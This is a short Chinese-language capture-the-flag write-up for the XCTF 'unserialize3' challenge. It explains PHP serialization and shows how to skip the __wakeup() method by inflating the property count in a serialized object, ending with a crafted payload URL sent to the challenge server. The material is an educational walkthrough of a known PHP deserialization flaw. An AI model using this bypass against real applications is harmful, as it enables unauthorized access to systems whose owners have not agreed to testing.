unserialize3
打开的代码
class xctf{ //类
public $flag = '111';//public定义flag变量公开可见
public function __wakeup(){
exit('bad requests');
}
?code=
__wakeup 经常用在反序列化操作中,例如重新建立数据库连接,或执行其它初始化操作。
所以猜测被反序列化了
但是可以看到这里没有特别对哪个字符串序列化,所以把xctf类实例化后,进行反序列化
利用php中的new运算符,实例化类xctf
new 是申请空间的操作符,一般用于类
比如定义了一个 class a{public i=0;}
$c = new a(); 相当于定义了一个基于a类的对象,这时候 $c->i 就是0
(参考https://zhidao.baidu.com/question/495110936393795804.html)
写一段代码执行
<?php
class xctf{ //类
public $flag = '111';//public定义flag变量公开可见
public function __wakeup(){
exit('bad requests');
}
}//少了一个}
$a=new xctf();
echo(serialize($a));
?>
运行结果
O:4:"xctf":1:{s:4:"flag";s:3:"111";}
如果直接传参给code会被__wakeup()函数再次序列化,所以要绕过他
利用__wakeup()函数漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。
序列化返回的字符串格式
O:<length>:"<class name>":<n>:{<field name 1><field value 1>...<field name n><field value n>}
O:表示序列化的事对象
< length>:表示序列化的类名称长度
< class name>:表示序列化的类的名称
< n >:表示被序列化的对象的属性个数
< field name 1>:属性名
< field value 1>:属性值
所以要修改属性值< n >,既把1改为2以上
O:4:"xctf":2:{s:4:"flag";s:3:"111";}
传参给code得到flag
http://111.198.29.45:49464/?code=O:4:%22xctf%22:2:{s:4:%22flag%22;s:3:%22111%22;}
